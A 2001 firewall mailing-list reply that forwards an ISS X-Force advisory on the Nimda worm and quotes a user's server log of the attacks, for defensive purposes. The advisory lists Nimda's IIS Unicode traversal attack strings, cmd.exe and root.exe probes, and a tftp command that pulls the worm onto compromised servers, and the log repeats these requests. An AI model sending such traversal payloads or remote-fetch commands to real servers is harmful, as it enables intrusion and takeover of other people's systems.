[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] Re: [FW1] New worm on the road?
I've found this on an other mailling list (Xforce) Internet Security Systems Security Alert September 18, 2001 Aggressive Propagation of Nimda Worm Synopsis: ISS X-Force has captured a new Internet worm, known as Nimda, that contains much of the functionality of Code Red worm and its derivatives. Nimda attempts to identify vulnerable Microsoft IIS servers and deface them, and attempts to infect additional systems. Nimda is potentially more dangerous than Code Red or Code Blue, because it includes a powerful e-mail distribution component. Code Red was limited to infecting Web servers running IIS. Nimda, on the other hand, can infect any Windows system, and then distribute further by emailing copies of itself to individuals in MAPI (Messaging Application Programming Interface) address books, or by identifying and infecting vulnerable IIS servers. This distinction means that there may be millions of infections. Indications of severe network outages related to the massive amount of network traffic this worm generates have already been reported. Description: Nimda is vastly different from Code Red in how it propagates. Nimda takes advantage of standard e-mail distribution techniques to broaden the eligible pool of target hosts. Instead of only attacking Web servers with Web server vulnerabilities, Nimda is designed to propagate via spoofed e-mail. The e-mail is spoofed to appear as if it came from trusted sources. Nimda relies on extensive local propagation once a system is infected. It replaces .dll, .eml, .nws files on all shared drives. It also appends itself to all .htm, .html, and .asp files on the infected system. This also allows the worm to spread to remote users when they access Web pages on infected servers. IIS Scanning and Propagation Nimda will use several Unicode Web Folder Traversal vulnerability attack strings to probe for vulnerable IIS systems. The attack strings used are as follows: /scripts /MSADC /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ (root.exe is the backdoor that Code Red II installed on infected servers) Nimda appends "/winnt/system32/cmd.exe?/c+dir" to the end of each attack string and inspects output to determine if the target system is vulnerable. If a vulnerable IIS Web server is found, Nimda will append the following command to an attack string to upload a copy of the worm to the vulnerable server: tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 E-mail Propagation Nimda will read the e-mail address books on the infected system. It will e-mail a copy of itself to each address in the list. The Subject: lines of the e-mails containing the worm will vary. Backdoor Functionality Once a computer is infected with Nimda, the worm takes steps to "backdoor" the infected system, by creating accounts that could provide further access to the system by remote attackers. Nimda will create a "guest" account if it doesn't already exist, or activate it if it has been disabled. It will also add the guest user to the "Guests" and "Administrators" groups. Nimda will also open the "C:" share to the Internet, giving full access to the C: drive of the infected computer. Attackers from anywhere on the Internet may access this share with full read/write access, once this share is opened. Recommendations: ISS RealSecure detects the Nimda worm through the HTTP_IIS_URL_Decoding signature. This signature was included in Network Sensor X-Press Update 3.1 and Server Sensor 6.0.1. RealSecure Network Sensor also detects the Nimda worm with the HTTP_Windows_Executable signature. ISS BlackICE products will the trigger the "2000639 - HTTP UTF8 backtick" and "2002595 - IIS system32 command" events. ISS Internet Scanner customers can test for this vulnerability using the IisUnicodeTranslation check, which was included in XPU 4.4 (and later updated in XPU 4.8). ISS System Scanner customers can test for this vulnerability using the MS00-078 check included in XPU 1.13 (#13). ISS X-Force recommends that all users contact their anti-virus vendor for software updates and Nimda removal information. Microsoft IIS administrators who have not yet installed the patch for the Web Server Folder Traversal vulnerability are encouraged to do so immediately. For Microsoft IIS 4.0: http://www.microsoft.com/ntserver/nts/downloads/critical/q269862 For Microsoft IIS 5.0: http://www.microsoft.com/windows2000/downloads/critical/q269862 The Nimda worm takes advantage of well-known security weaknesses in IIS, as well as a general lack of security awareness among Internet users regarding e-mail attachments. ISS recommends that all IIS administrators apply all security patches immediately and follow published Microsoft IIS Security Checklists. Please refer to the links in the Additional Information section. Additional Information: ISS X-Force recommends that all Web site administrators review the appropriate IIS Security Checklist from Microsoft, and verify that their IIS Web servers have been configured securely. IIS servers that have been configured securely, using the Checklists, are not vulnerable to many of the recent and widely publicized remote IIS exploits. The IIS Security Checklists are available at the following locations: For Microsoft IIS 4.0: http://www.microsoft.com/technet/itsolutions/security/tools/iischk.asp For Microsoft IIS 5.0: http://www.microsoft.com/technet/security/iis5chk.asp Web site administrators are also strongly encouraged to apply the latest IIS cumulative security patch to prevent Web servers from being compromised by this and other IIS exploits. This patch is available from the following Microsoft Security Bulletin: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp ______ About Internet Security Systems (ISS) Internet Security Systems is a leading global provider of security management solutions for the Internet, protecting digital assets and ensuring safe and uninterrupted e-business. With its industry-leading intrusion detection and vulnerability assessment, remote managed security services, and strategic consulting and education offerings, ISS is a trusted security provider to more than 8,000 customers worldwide including 21 of the 25 largest U.S. commercial banks and the top 10 U.S. telecommunications companies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe, Latin America and the Middle East. For more information, visit the Internet Security Systems web site at www.iss.net or call. Copyright (c) 2001 Internet Security Systems, Inc. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail [email protected] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://xforce.iss.net/sensitive.php as well as on MIT's PGP key server and PGP.com's key server. Please send suggestions, updates, and comments to: X-Force [email protected] of Internet Security Systems, Inc. Best regards, David Patrick Coomans wrote: > Since this evening I am experiencing massive attacks on HTTP (IIS > oriented I presume) from many different IP addresses. They all look > like: GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET /scripts/root.exe?/c+dir HTTP/1.0 > GET /MSADC/root.exe?/c+dir HTTP/1.0 > GET /MSADC/root.exe?/c+dir HTTP/1.0 > GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Is > anyone aware that this is some new kind of worm?Now my FW1 question: > can I create a HTTP resource (secure server) that blocks all requests > that e.g. have a .EXE in it ? Or would that slow my FW1's down to > much? Any other suggestions for good products that can do HTTP content > inspection and that cooperate or can co-exist with fw1 > ? Thanks,Patrick -- David LEFEVRE CARDIF - Architecture et Sécurité Opérationnelle [email protected] - Tél : 01 41 42 76 63 [email protected] - Tel : 01 41 42 24 22 ********************************************************************** L'intégrité de ce message n'étant pas assurée sur Internet, CARDIF ne peut être tenu responsable de son contenu. Si vous n'êtes pas destinataire de ce message confidentiel, Merci de le détruire et d'avertir immédiatement l'expediteur. The integrity of this message cannot be guaranteed on the Internet. CARDIF can not therefore be considered responsible for the contents. If you are not the intended recipient of this confidential message, then please delete it and notify immediately the sender. ********************************************************************** ================================================================================ To unsubscribe from this mailing list, please see the instructions at http://www.checkpoint.com/services/mailing.html ================================================================================
|